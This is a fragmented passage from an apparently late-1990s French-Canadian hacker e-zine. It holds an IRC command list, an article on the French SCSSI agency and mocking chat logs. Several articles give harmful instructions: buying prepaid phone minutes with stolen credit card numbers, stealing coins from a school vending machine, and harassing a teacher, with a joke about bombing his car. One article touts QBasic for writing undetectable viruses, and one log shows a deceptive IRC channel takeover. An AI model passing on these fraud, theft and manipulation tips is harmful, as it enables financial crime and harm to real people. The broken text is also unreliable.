#wraez-mechant voice sur #wraezfrancais subop sur #wraez-france PUTIN allume chu PAS UN PUTIN DE LAM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hui la pour taide rmais is tu veux te fiare dégonfler par nico c TON choi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poura DIRE QUE JAIE SSAYER DE TAID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NONY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le amster du chanel av etre content de voir quile st taker par nico qd tu auras pu éviter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que ton NICO est op sur #Warez-Méchant aus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lors oublions ca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ON NICO NEST APS OP SUR WAREZ-MECH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ah oui a chauqye fois j vias faire un tour ils est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 malad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 a été op 1 fois et cela IL Y A 1 M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k j lais vu l autre jour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il ets PERM B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 jure us ma te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HOIS  NiCo15 (chaillan@d-98-133.mrs.ftci.oleane.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RiGiN] Commercial (United Stat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AME] Laisse Bet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SERLEVEL] 100 - Normal U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HANNEL(S)] #eggdrop-fr #mp3hiphopfr @#isofrancais @#warezfrancais @#playzone @#mp3francais @#linuxzone #bn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RVER] Caen.Fr.Eu.UnderNet.org - Ecole Ingenieurs - Caen- Fr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DLE] 18se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___________[END OF WHOIS]_________ ____ _ . . _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 on a assez de eggdr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ca l af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hek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n a 2 eggdrop qui restent la pour gardé le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on eggdrop pour 1 hrs va p-t éviter que ton chanel soit take over par nic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t le restent pour se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omment tu veux quil le TA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i tu met mone ggdrop op qd nico15 va partir on lenleve et tu naura pas été také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omment tu veux quil le TA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Il existe une Faille Linux don ils existe quelque rare exploit , nico sais comemtn ca marche et en 1 minute il peux devenir owner du eggdrop avec cette faile tu compren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No Such Nick/Channe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ckname/Channel is currently unuse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Il existe une Faille Linux don ils existe quelque rare exploit , nico sais comemtn ca marche et en 1 minute il peux devenir owner du eggdrop avec cette faile tu compren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heck si y fais un TAKE ya u IRCOPS dan sl c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t ca ses pas de la sala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ouais , Nico lui ya une liste de agt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ys ne fou des ir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lors , Op Mon eggdrop Dont la failel a été Patché , jusqua ce que Nico parte du chanel (parte apr lui meme) et jenleve mone ggdrop .. et tou ave tre corek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jte donne en surplus un FTp de Mp3 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ve cplein de jeux i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epux me faire confi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ttend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rop pres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rop pres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tte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 chu rpes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 COZE NICO IL PEUT TAKER N-I-M-P-O-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A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k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me fais confiance et tusauve ton chanel + tu aggne de smp3 ou tu me fait pas confiance tu eprd ton chanel tu a plus al chance detre mon friend pis ta po d'mp3</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chec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le NiCo15 quans il commenceras a apporter ses Clones ben on regarderas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e sais pas si ta remarqué mais nico a a deja 3 eggdrop a luis ur le chanel .. pas pour rine hei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quoi le sn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y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readerro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robote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redato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regar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est ald enrier foisq ue je te le d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op moi et mon eggdr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inon tu te fais taker ton chanel apr ce pd de nic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tetnd la j me fais Flooder par un cocomb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je vaispartir apres quil ets quitté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dis moi son nick jmen occup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du concomb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ttend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on j lais Bani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ou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brav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lo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ah men faut pas s en faire avec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vec s qui dit la j men col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omale me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e texplike pour al denrier fois , Nico entre dna sle eggdrop , Il se met OWNER (il devien maitre du eggdrop) il se deban enleve invite only se op et deop tlm .. clap clap et tlme st dea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PU DE CHA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ETS CA QUE TU VE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fais mon confi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n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oi chu la pour faire chier nic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an qu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veux toujours avoir mon channel mais j attend qui l fase pour le cro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aske la jme coliss poma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si il el fait tu va avoir lair f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 ma deja taker 1 chanel ya 1 m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veux pas qui recomme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ah oui j aurrai l air fin j ia faites s que j avais a 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va voir , #wraez4all yavais tlt 40 user cheke la .. ya pu aprsonne a cuase de l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ente pas pentoute d aller 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omme j te dit avec s qui dit et s qui fais ya une criss de grosse diffre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ais sque jte dis cest apsdes blagues .. pkoi tu pensse quila réussi a taker #wraez4all ?????? Il a fait un exploit Lin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is la jai aptcher mes eggdr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Veux tu savoir al vrai raison que je veux que tu me o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 en a 3</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vas-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1: e touche a tou sur Mirc le monde du warez mais jai aucun contact dans le Mp3 , j veux me faire des Contact dans ce monde et des ami ! (cela me donne plsu de crédibilité envers les grand et gros groupe de crakcer genre PDm et class ...( en apssant si je devine dans ote gang .. zaller avoir des FTp avec des connexion T3 et + a votre disposi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XCoRe:#warez-mechant- FTP 2:ftp://216.25.117.21/20%20%20%.20%20%20%20%20%.temp/back20%20%up/.20%20%20%.files/Links_LS_2000-FLT/ Port: 21 Login: anonymous Passe: anonymous [] ajouté le 11/10/1999 à 16:32 par n3ophra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2: nico ma deja fait un takr over et je evux aps quil recommence et pla meilleur facon pour qu vous mapceptiez cest que je vous aide a ne aps vous faire avoir par ce C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ya aps de 3 ieme raison .. ha wouais .. jveux me faire + de contacte et de copai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sais to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la sont ou tes eggdr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ont tu sur un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rmalement si je réussia rentrer dna sun Bon groupe de Mp comme vous je devrai etre accepter dans Class ce qui evux dire que vous auriez acces a un ftp connexion OC3 (35 meg seconde) avec environ 600 Gg despace libre et 800 gig despace utilisé ( cela vous ferais une bonne plac epour metre tou vos Mp3 ) et deas que vous en avez de un vous aller le downaloder et ca vous rpend .. un gros 10 seconde si vous tre cba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la jai juste 1 eggdrop de lanc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is c le meill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yé spoofer a mon ip yé sous fa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 est dans le Ca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est MoLoToV</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a dit quil ets sous win32 mais cets Linux BitchX ass 2.34.&amp;8</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 -arshitech- alros ? tu e crois ou tu me laisse aller trouve dautr eMond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e qui est cool c que jadore le hip h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ai une belle collectiond e diske mp3</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ais tu v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 est pas si facile que ca prendre une desciss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meme tres compliqu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urtout que l autre gars qui est avec moi pour le channel n est pas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don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faut que j attende son arriv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e sias mais cela juste pour 1 h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e le agrs de class me vo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la si me vouler plus apres je part sinon je ret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vous aurez les avanta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e jai nomÉ + ha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suis pas un lamer tu sa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te connias a pei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i ej ssui rendu ou c que je susi c que jai aider bcp de mo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la c vote t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is sv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ide moi a réussi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XCoRe:#warez-mechant- FTP 3:ftp://209.94.157.4/ Port: 21 Login: anonymous Passe: anonymous [] ajouté le 11/10/1999 à 16:33 par n3ophra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suis aps un lam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 le ju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lors decide soit tu maide et je taide et vous aurez tout ce que vous vouel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 soit tu maide pa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la ca va me nui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 entouk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heck viens dont sur un autre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hiphop_connec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la j vais pouvoir te le faire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ais pas sur #mp3hiphopf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ubli ca tout de su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vias mettre dan sl topic d aller sur #hiphop_connect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Ya person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fo qui aie du Mo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n supli m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 geno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uste pour MEME pas 30 mi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vais en apporter du monde cal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je pa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jvous donne el ftp prreil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viens sur #hiphop_connec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y suis all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yq ue des Bo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P moi sur ton chan #mp3hiphopf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our 5 minute top hron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apres eprm ban moi a v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es mala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ne supl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estion de vie ou de mo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n supl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heke viens ur #warez4al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viens sdont sur #hiphop_connec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jva te op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our te prouver hcu po un cav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is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men coliss men d etre op sur ton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R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REGAR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I JE SUSI APS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DICI KKMI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HU MORT CALIS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COMRPEND T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VA ETRE REJECT DE CL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IS CA FAIT 3 MOI JE BOSSE PORUA LLER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viens sur mon channel pis on va faire venir tout lmo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 OPS UR WAREZ4AL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OUR QUE SI JFA DE KOI DE CROC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BIN TU ME DE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TU FAIS UN TAKER OV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V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N SUPLIE A GENO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5 mi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ai aps tout fait ca pour r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 viens sur #hiphop_connec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heke chu op PARTO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 un CHANLE IMPROVI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am dit rien du tout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 existe pas depuis LONGTEMP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y va avoir un X biento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lo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regar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 le jrue sur ma tete mon ord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 me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Va voir dan sles INCOMM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on ep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 blo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out ce que ut ev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e ej ferai aps de mar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que je aprt sans rine d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 sa m dit rien du to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v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V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ne supli m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uste 2 mi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e le mec de cla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e vo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des quil b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kick ban m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non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peux pas faire ca deme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viens dont sur mon criss de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d le mec va arriv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hiphop_connec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 dis sont nic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me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 va Ok ANONYM Your Are accepte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is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me de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V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4:55:58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4:56:00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XCoRe:#warez-mechant- FTP 5:ftp://165.117.240.35/server/.tmp/ Port: 21 Login: anonymous Passe: anonymous [] ajouté le 11/10/1999 à 17:17 par n3ophra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4:57:29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4:57:49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 suplie a genoux jte odnne tout ce que ut veux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rust moi yinke 1 mi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 f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inon chu mo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voi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i ta un coeur ou une affaitre tu devrai Bin voir que ca compte plus au monde que toute ste putin daffaire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is tu devrai Bin voire que chu since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notice)&gt; MoLoToV You have 1 note waiting on MoLoToV.</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ur mp3hiphopfr ... lautre chanel ne fonctionera pas !!! cets sur ... jen suis s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notice)&gt; MoLoToV For a list: /MSG MoLoToV NOTES [pass] INDE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5:00:10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5:00:30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heck ca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nvite m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v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ai quitter snas faire exp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tu veux t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1 m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30 seconde TOP chronome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uré promis crach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ttend la l gars ye tu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 est koi sonnnom au us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lui dit de ven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ttend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quest-ce qu ime dit que toi tu veux pas me faire un take over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posera tout les question que tu evux au ga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is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y va te répond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 tes sur le meme channel que nico15</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hec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elel chane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raezfranca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arezfranc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kes tu fais sur #warez francais si NiCo15 est op et qu il t aime pas la fraise et que tu est Voi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Nickname in use "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ckname already exis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Nickname in use "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ckname already exis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Nickname in use "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ckname already exis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Nickname in use "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ckname already exis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notice)&gt; MaXCoRe Il y a actuellement 6 FTPs dans ma liste. Dernière mise à jour le 11/10/1999 à 16:32. Un FTP est diffusé toutes les 7 minut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notice)&gt; |LEGEND| Bienvenue sur le chan #warez-france , ANONY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notice)&gt; |LEGEND| Il y a actuellement 6 FTPs dans ma liste. Dernière mise à jour le 08/10/1999 à 06:59. Je diffuse un FTP toutes les 7 minutes sur le channel #warez-fr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notice)&gt; W AUTHENTICATION SUCCESSFUL ON #quaz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notice)&gt; W AUTHENTICATION SUCCESSFUL ON #qh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notice)&gt; TGOD Welcome in #qha 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e suis voice sur #wraezrrancais depuis plus de 4 m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nico vien darriver sur #wraezfrancais depuis 2 m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lors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hei je connais bien les mast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si il me ban ils e retrouve b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lros jai aps de proble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va sur #mp3_hiph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 j peux rien faire pour toi desol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Heeeeei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VOUAL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ALIS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VA ME TU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va etre plsu clair si tu catc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a fait po 5 ans chu sul net pour r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catch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veux TAIDER de donner des F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is to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R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NONY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veux yinke 1 min de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oure tre saf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IS SI TU EVUX P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srai PO dans CLA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COUTE MOI CAL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IS CRISS TU AV SAVOIR C QUOI EN ESTIE SFAIRE ÉCOEUR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ME SUIS FENDU LE CYUL 3 M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OUR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COUTE MOI CAL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IS T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 CAUSE DE T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COUTE MOI CAL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COUTE MOI CAL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E LAURAIS JAM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k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RRETE OU SINON J REVIENS PAS SUR MA DESCIS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LE CHANNEL EST PAS PROTÉGER PAR UN W</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I Y SERRAIS PROTÉGÉ PAR UN W J TE OPERAIS AIS LA SE SAPS L CAS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DÉLIC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I JAMAIS TU FAIS UN TAKE OVER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MOI QUI EST MO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U CATCH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AI BOSSÉ SUR SE CHANNEL LA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N A UN SRIPT #MP3HIPHOPF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N A UN SKIN MP3HIPHOPF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OUR WINAM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IS ON VEUX PAS L PERDE NOTRE CHANNEL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FEK SI TU FAIS UN TAKE OVER SES TOUTE A RECOMMENCER TU CATCH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vous le perdrez pas ma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 POUR CA J HÉS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E CATC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R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HU PAS C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 pour ca j hés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i j aurrai un W</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E SIAS A QUELLE POINT VOUS AVEZ BOSSER DURE POUR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a bosser aussi dure que m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te lesserais mon gars faire s que tu v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fek moi j veux ben te donner ta ch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our aovir loportuniter que ja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me sauverais la v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asi criss j ai peur de l perde mon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is je ferai JAMAIS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n tu le perdera P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nvite moi s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No Such Nick/Channel "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ckname/Channel is currently unuse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peux pas enlever l invite only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peux pas rentré dan sl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ai étédeconnect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er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Bin t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eter dans les eggdro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s tu un acc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XCoRe:#warez-mechant- FTP 3:ftp://209.94.157.4/ Port: 21 Login: anonymous Passe: anonymous [] ajouté le 11/10/1999 à 16:33 par n3ophra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u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s tu una cces dans un des eggdro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fais lui un dcc ch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la tu écris ton pa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va faire .console #mp3hiphopf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oXMP3HH&gt; Set your console to #mp3hiphopfr: (no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koi j fais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ra po long tu conanis tu ca un peux les eggdro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 jte odnne la ocmamnde dans po lo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un p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sais tu comment adder des suer pis toute gen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n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a j sais p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fa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ode #mp3hiphopfr -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is ca va etre core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arche p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izare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ayon st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lt;Arshitech&gt; .mode #mp3hiphopfr -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h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15:24] &lt;BoXMP3HH&gt; What? You need '.hel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ia la fonctione numero2</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ui corespo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p-e pas la version que tu pens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n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 un eggdrop molotov</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omme le mien :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our quil enregistres les coordon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dois faire atte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HOIS  BoXMP3HH (calbo@elite.ntic.qc.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RiGiN] Canad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AME] #ultrabox servic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SERLEVEL] 100 - Normal U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HANNEL(S)] @#mp3hhfr @#radio-hiphop @#mp3hiphopf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RVER] montreal.qu.ca.undernet.org - Ecole Polytechnique de Montrea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DLE] 1day 19hrs 29mins 32se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___________[END OF WHOIS]_________ ____ _ . . _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ouais je cherche dans mon liv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XCoRe:#warez-mechant- FTP 4:ftp://209.50.1.11/.tmp/.ftf/ Port: 21 Login: anonymous Passe: anonymous [] ajouté le 11/10/1999 à 16:48 par n3ophra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fait : dans le bot .say /msg invite #mp3hiphopft ANONY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fait : dans le bot .say /msg invite #mp3hiphopfr ANONY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fait : dans le bot .say /msg invite ANONY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voir si ca marc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i ca marhce tu va pouvoir rentr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haaaa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non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ai trouv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la comam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la commande exac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lo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oLoToV PING reply]:  68  second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fait : .console #mp3hiphop fr set chan mode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cris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t ap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me dis qd tu la fa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quoi ca va op tout lmmonde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Bin n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p = propriétaire op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va a avoir els option du chane propriétaire =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utrmeentd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dans 5 seconde j les f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5</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4</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3</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2</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1</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pres ca tu ecirs la 2ieme partit dla comam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la 2iem part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ou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oLoToV PING reply]:  24  second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a une autre comamnde pis c core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laque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 mo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ode wou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ttend jla cherc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ra po lo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k j en es essayez une pis sa pas march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ou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te donne la comamnde pis c b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oLoToV PING reply]:  25  second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No Such Nick/Channe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ckname/Channel is currently unuse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u fais .op #mp3hiphopfr molotov op pour propriétaire option le chanel puis le systeme que le eggdrop utilise pis qd ta écris ca tu attend environ 1 minute pis tu fais .mode #mp3hiphopfr op i- by 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is al denrier comamnde ut la fais dans 1 mun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pres que tai fait la 1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 ses fais dej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ai juste faite .invite mon n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heck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la j te fais entierement confi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ou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vais te op mais s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fais pas de take ov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as de cro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p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nvite s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viens pour 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bon enf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espere que tu m joue pas dan sl dos en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repond S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le sav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rci pareil en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rissmen j tes fais confi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va te le redon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est pas p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 yinke pour meme pas 10 me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5:43:08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5:43:45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 la j suis comme a terre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 j espere que tu va me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repond moi au moi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Cannot Send To Channel "#mp3hiphopf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You can not send when: (a) not on a channel which is mode +n or (b) not a chanop (or mode +v) on a channel which has mode +m set and is trying to send a PRIVMSG message to that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Cannot Send To Channel "#mp3hiphopf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You can not send when: (a) not on a channel which is mode +n or (b) not a chanop (or mode +v) on a channel which has mode +m set and is trying to send a PRIVMSG message to that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Cannot Send To Channel "#mp3hiphopf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You can not send when: (a) not on a channel which is mode +n or (b) not a chanop (or mode +v) on a channel which has mode +m set and is trying to send a PRIVMSG message to that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Cannot Send To Channel "#mp3hiphopf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You can not send when: (a) not on a channel which is mode +n or (b) not a chanop (or mode +v) on a channel which has mode +m set and is trying to send a PRIVMSG message to that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repond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RROR| Cannot Send To Channel "#mp3hiphopf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You can not send when: (a) not on a channel which is mode +n or (b) not a chanop (or mode +v) on a channel which has mode +m set and is trying to send a PRIVMSG message to that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repond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te repondais moi quand tu m ecriv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a prenais 10 me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rieux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st-ce que tu va me re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u ses vraiment pour prendre le controle du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arce que la j me rend compte que tu ma dit des menterie par apport a NiCo15</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r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u vois la j suis banni du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hey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veux te parler la 5 tite mi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as pl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XCoRe:#warez-mechant- FTP 1:ftp://194.226.30.40/ Port: 21 Login: anonymous Passe: anonymous [] ajouté le 11/10/1999 à 16:32 par n3ophra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va te deb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HOIS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RiGiN] Commercial (United Stat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AME] P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SERLEVEL] 100 - Normal U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HANNEL(S)] #aideirc @#radio @#fresh_style @#hiphop_connec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RVER] NewBrunswick.NJ.US.Undernet.Org - AT&amp;T WorldNet IRC Chat Servi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DLE] 0se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___________[END OF WHOIS]_________ ____ _ . . _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st-ce que tu va me redonner le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u tu va gardé le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repond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veux sa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redonb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redonb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redon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espere men parce que j ai bossé pour se channel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u compre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wou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omme jai pu bossé pou me faire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t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5:52:41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5:53:57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n plein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k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5:54:03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5:54:04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on gars ye tu venu dej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kel ga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notice)&gt; zFb PI FILE MOI TES C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5:54:30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5:54:38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le gars tu disais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po vra ca =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5:54:47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5:54:54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lors tu m a pris l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 est s que tu veuxme d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n jva te le redonn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5:55:18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5:55:21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5:55:24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5:55:26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la j vois l topic et to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comme si vous y etiez pour longtemp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on nico ya juste a s amu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trouve ca pomale pla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tes fais confi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n criss me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u devrais etre recnnaiss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rvi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aimerais ca l ravoir la mon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arvinet sul cha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leur est demande de po te kic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5:59:58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0:05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j me fais kicker toujou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00:16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0:18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suis bann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00:56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3:20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peux revenir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an y veule p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03:27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3:36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dans l fond j ia perdu mon fameux chan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y vont le lach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de k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genre tu va arriver un jour y va rester 2-3 eggdrop pis jva te le reconnd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tyle dans 1 j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04:16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4:43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tr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on channel y marche a fo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is j veux pas l perdre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05:05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5:10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rieux s etait suposer etre pour quelque temp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genre 10 min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 j tes fais confiance j tes refiler mon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ome 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u pire op moi pis j vais en faire un take moi aus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sais comemnt t inquie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ais la j trouve ca chien en cal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ense-y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ri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qh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06:59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7:01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quoi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ote ch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XCoRe:#warez-mechant- FTP 4:ftp://209.50.1.11/.tmp/.ftf/ Port: 21 Login: anonymous Passe: anonymous [] ajouté le 11/10/1999 à 16:48 par n3ophra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va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07:07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7:09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NiCo15 est la et il v ame ban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h oubl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question comme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st-ce que ta fais ca pour ton cl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hie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08:42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8:48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prendre mon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heeee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08:58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9:07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uh ate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koi est-ce que tu voulais mon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cq</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voila un peu lpus cla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 mon demand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de le tak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car tu leur avais fait kkcho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09:35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09:41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leurs a fais de koi m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eux qu il mon pris mon channel lautre f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il lavais deja tak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c est ca l af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OOOOUAHAHA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o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10:05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10:07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is y l on perd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sais aps pkoi par exemp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10:19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10:26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uis revenu et hop y avais plus r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k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u serrais vraiemnt corrcte de me le redonn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he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11:23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11:29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u peux deop tout l mo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t me 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t m le redonn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n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va me faire tu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a leurs fou rien a eu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11:47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11:49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h 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11:54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11:55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12:06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12:22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p moi avec un de tes eggy et j vais faire un ta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ais surment tes de leurs coté dan sl fo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u veux l gardé autant que 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ll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ya surment un moyen de s arranger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ll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tyle durant la nu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jdeop tl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14:45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14:51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en chec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facile de dire que javias un accesss sur un des tes egg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a me mais op et hop j fais l ta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dans l fond tout s que t aurra a dire ses que j etais lpus futer que tu l croay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héh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de koi du gen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bin le probl c qui save que chu fort en eg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lt;join&gt; Neaso (NEASO@cve-home-1-5.urbanet.ch) has JOINED #mp3hiphopfr 4:12pm P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hoh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arce uqe la ya neaso est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y dois capoter ra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deban moi S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VI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100]«Neaso» moi je vais pas m'énervé pour un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hum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ais quand me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redator me Ban a chaque f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 faut s arranger gars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pas coo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allé S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nico veux p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23:35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23:49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pkoi vous ets tous a ses pied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j comprend p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y nous a take over le #radio aus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la ya W</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st-ce que tu va etre ici se s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tes toujours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p-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26:45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26:52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tjrs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sauf kand yé dléco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27:01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27:01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est-ce que ta parler avec Neas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m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repond au moi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o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ONYM· mais yé part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29:42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Start: Mon Oct 11 16:29:57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Ident: Arshitech (pbourass@ts1-10.f2305.quebecte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bah sa decoura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0]«Arshitech» ses découragent en cal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ssion Close: Mon Oct 11 16:30:17 19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HacKinG ConNectIOn By [Shad0w]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TART ( OUBLIER PAS JLE SAIS QUE JFAIT DES FAUT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lui la sa va etre plus simp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oit que tu va chez le ga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e tu run le prog DuppeRipper.exe ( Non ye pas dans le zine Ds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 va avoir un fichier temp style ~temp4577</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louvre aik notepa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tu chec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eme manie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te pogne un cav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ur intern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tu lui shoot le pro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 tu lui demande de te renvoyer le ficher tem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3eme manie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te pogne un trojan ( SECTION NEWBIES ADVENCED STAR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envoie un tit msg box qui marke son username pit apres son pa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voie la repon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tu envoi dupperiper.ex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tu d/l le fichier TEM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En passant C'EST TRES UTILE UNE CONNECT HACKE PKE TU PE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PAS TE FAIRE RETRACE ( YEAHHHHHHHH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ab/>
        <w:tab/>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ab/>
        <w:tab/>
        <w:tab/>
        <w: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Shad0w] hellbc@altern.or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ww.hellbc.com &amp; www.qharulez.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ll Bringers Commando &amp; Quebec Hacker Alliance 4ever</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PaGe HacKinG By [Shad0w]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VISE RUL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pas de section Newbies auss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prend le jolie pro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RACKFTP.exe ( ou un not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te pogne une password list *** Article PassWord CraCkin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trouve le username pit le pa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ittuelem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u pogne un ftp ( 3dftp.exe ( BEN OUI VOUS LE SAVEZ C DANS LE ZI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CRIS I VA DEVNIR GROS SI SA CONTINU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tu te connect aik le username pit le pass sur la page de compagnie du s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p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modif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tamu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c s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quand mee facile ... faut dire que mon artcile est pas super Complex La des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ke c pas complexe a comprend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Shad0w] hellbc@altern.or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ww.hellbc.com &amp; www.qharulez.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ll Bringers Commando &amp; Quebec Hacker Alliance 4ev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PassWord CracKinG By : [Shad0w]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ab/>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lut vous otr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out dabbor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aimerais mexcuser tusuite pour les faute D'Orthograf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huis bon la dedans pit sa me tente pas de me forcer today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Passon au Password Cracking ;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out dabbor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avez surement entendu dun prog de password crack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enre Cracker Jack de chose deme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our les Newbi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aller d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HHHhhhhhhhhhh comment i font pour faire de progs demme??? SONT PR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en Non c simp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Je suis programmeur ( Bon jcommence mais quand meme .. ( Jprog En VB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jva vous dire que meme moi chuis capable defaire s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en ou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TAR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Shadow Crypt Password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vous avez vu sa a kekpart c su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kyarive c ke windows crypt votre mot en **** et comment le drcrypt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fait apelle a window DDE serv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vous direz pas com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st password cracker sont tres uti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exemple frequent et populaire : Revelaton.ex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tres bon prog ( il est dans le zine  !!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BruteForce Password Crack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koi un brute force password crackin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tun brute force password cracking sta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vous savez pas c k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tun password cracking souvent utiliser pour les site internet locker ( comm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site de cul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sa lit  une password list pit sa envoi le pass de toute ta liste au site pit sa aseile de se connect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eilleure exmple : wwwhack.exe ( Dans le Zine ben oui !! ( YA TOUT LA DEDANS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vous aller me d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N A PAS DE BONNE PASSWORD LI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 gagne de cav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s asser bri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PREND LE DICTIONNAIRE DE WORD97 - 98 - 200</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en oua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Est pas dans le zine pke sit ta pas word !! cris t meme pas foutu de lire le zine dans ce cas la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Ya aussi des pro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i asseille toute les combianais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qui asseille des random pa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Ceci prendra bcoup de temps c norma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ais c le plus fiab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Le Random est deconseiller car il peut lire le pass ( EXEMPLE : "djsfkgh" plusieurs fois vous comprener ???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Hey en pass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chuis sur mon vieux 486 pour /creire s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ya meme pas de mouse putin!!! fake vner pas chialer svp pit pour les faute style e accent aig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spaske chuis sur un clavier anglais pit que sa s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ab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>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venons a lartic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FTP Password Crak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le Ftp password crack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ST TRES UTILE ( pour un non newbi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ko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deme que tu picke des page web EHeHeHE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c comme un Brute Force password cracking sauf que tu te connecte au port 21 (Le plus utilisr de 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u au choix et puis sa shoot des password juska tent ki pog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socket PASS ACCEPTED ( ou dotre chose la ..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eHE Abituellement le username est root ou les username dla pag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EX www.hellbc.com --&gt; hellb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VINER KOI !!! DANS LE ZINE !! ( FTPCRACK.exe **** Copyright QHA ( Quebec Hacker Allianc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CALCUL RAPIDE DES MOT BON ET BEN == 23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Mirc Password CRacking ( MA SPECIALITY HeheH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sa ya un prog mais c IGA qui la faite fake sa me tente pas dle mettre dans le zine :) ( me peut etre en faire un c quand emme facile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otre manie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pogne une gate aik le meme host que le ga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met le met username du gars ( Newbies goto Section Newbie un peut plus ba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te conec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 tu tasseil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kesse tu peut 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n cas de netpl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ick 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meilleur fas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ke tu shoo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Key lo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un input lo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BEN GADON N!! C DANS LE ZINEZ :P ( kewylog95.ex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He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ya aus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s tit mirc troja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e jai fa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programation de mir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ma vi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Quand le gars vous gosse tu fait /ctcp Le gars /run format c:/ /y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ction NEWBI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fait /who 0 o ( pour Newbies Newbies Secton S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u regarde les bo nicks qui apparais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and ten voie un Aik un H ( qui veut dire HE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en tu fait /msg "LE GARS" hello im a newbies and i want to get the password of the #CHANNN PLz help M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Res pratiqu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CTION S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sg [Shad0w] chuis dnas section S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enco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un format c:/ /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mon article se fini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garder les autre article qui peuve se ratacher a ceci comme pour Connection Password Crack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Shad0w] hellbc@alter.or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ww.hellbc.com &amp; www.qharulez.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ll Bringers Commando , Quebec HAcker Alli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Thankx</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PhrEakINg By [Shad0w]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l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morconaisser surement p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Jvient juste decrire 4artic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lui aussi va etre pas mal Simple M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HANCEUZ JIDEE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YA UNE SECTION NEWBI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HH TU DOIT ETRE CONTEN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ta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ir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pogne un tit magn/t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u met ta piece dan machien tu enregiste le bruit que sa fai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OUI !! SA FAIT DES BRUI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Jid Et DEC : Pas les bruit que vous penser la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ik c bruit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comme quand tu met des 25 cen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ake la tite telephoniste a sfait toue cros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CTION NEWBI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pogne les tit prog qui ont les bruit sur lordi ( onn on la pa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t enregi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ab/>
        <w:t>Les BO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box sont une petite boite "remplie" de stuff electron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i sert a prendre une ligne telephon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plus connue est la beige bo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ci est une boxe simple qui permet daller sur le telephone de nimporte k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 me tente pas de vous dire comment la faire mais quand vous lavez vous aller dans la cour de votre vois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vous brancher les 2 ptit qui fil qui resort sur la ligne telephonique ( C'est le GROS fil noirt qui arive sur votre mais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la vous telephoner a des numeros de cul pu vous vous payer une belle connection intern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Faite sa quand vos voisin sont partit en vacanc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que tu vient de tout a coup manquer lecole pke t malad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ne Ch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Shad0w] hellbc@altern.or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ww.hellbc.com &amp; www.qharulez.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ll Bringers Commando &amp; Quebec Hacker Alliance 4ever</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ProGraMatOn By [Shad0w]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B RULEZ :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TART ( MA DEVISE C KOI ?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depuis un bo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program en VB</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huis pas le best des b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ke jcomme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yBeR-Js est bcoup meilleur que m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ou dabbord je vous consseille fortmeent VB</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r le language est facile et tres devlopp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pouver faire All King Of Stuff</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Pour Cette article pas de section Newbi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 Pauvre [Jidee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ab/>
        <w:tab/>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ab/>
        <w:tab/>
        <w:tab/>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out Dabbord tu te pogne VB 5 ou 6</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tu va chercher des Sources de VB</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les regarde tasseille de les modifi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les integre dans tes pro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t  tu tamu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 me tente pas de faire un big article la dessus pke sa sexplique pas vrai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peut vraiment faire pas mal daffaire en VB</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bon grand exmeple Regarder Les pog a CyBeR-J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OU SA ??? DANS LEEEEEEEEEEEEEEE ZINE ;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He ya pas mal de DOS attack *** Article la dess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pas mal s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vous savez pas programm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intenoreais quya kkun qui a vraiment du temps a perde va vous lexplik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comme le CHAT sa sapren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Shad0w] hellbc@altern.or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ww.hellbc.com &amp; www.qharulez.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ell Bringers Commando &amp; Quebec Hacker Alliance 4ev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lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000080"/>
        </w:rPr>
        <w:t>Undertaker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000080"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000080"/>
        </w:rPr>
        <w:t>rat + pétard a mêche + un case décole = beau jus dans la case décole Lol</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lang w:val="fr-CA"/>
        </w:rPr>
        <w:t>Enlever le tit button démarrer, par [FlaMeBoY]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>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remiere partie de larticle parent phreak...hmm..vous allez rire..bon</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our commencer ça vous prends -Windows 9x</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ab/>
        <w:tab/>
        <w:tab/>
        <w:tab/>
        <w:t xml:space="preserve">            - Visual Basic 4.0 ou +</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L'astuce de se programme est de caller des apis qui font disparaître le button windows, mais ces fameux api ne contiennent pas de function pour le faire réapparaître...(hmm...Bravo Billou!) en tout cas, s'il en existe, faites moi en part parce que je ne les ai pas trouvé.Le bouton démarrer disparait, et pour le faire réapparaître faut redémarrer(c'est stupide mais ma mère braillait...).</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bon dans VB faites ça:</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dans général (déclarations) tapez ceci:</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Dim hWnd1 As Long</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rivate Declare Function FindWindow Lib "user32"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Alias "FindWindowA"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ByVal lpClassName As String,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ByVal lpWindowName As String) As Long</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rivate Declare Function FindWindowEx Lib "user32"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Alias "FindWindowExA"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ByVal hWnd1 As Long,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ByVal hWnd2 As Long,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ByVal lpsz1 As String,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ByVal lpsz2 As String) As Long</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rivate Declare Function ShowWindow Lib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user32" (ByVal hwnd As Long,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ByVal nCmdShow As Long) As Long</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Const SW_HIDE = &amp;H0</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Const SW_SHOW = &amp;H5</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rivate Declare Function SendMessage Lib "user32" Alias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SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, _</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ByVal wParam As Long, lParam As Any) As Long</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Const WM_CLOSE = &amp;H10</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Ensuite , pour faire disparaître le bouton, fais un command button et entrez comme cod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SendMessage FindWindowEx(FindWindow("Shell_TrayWnd", ""), 0&amp;, "Button", vbNullString), WM_CLOSE, 0, 0</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mettez tout sur la meme lign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Voilà, le boutton n'est plus là..mouhahahahahahahaha!!!!!!!!!</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u w:val="single"/>
          <w:lang w:val="fr-CA"/>
        </w:rPr>
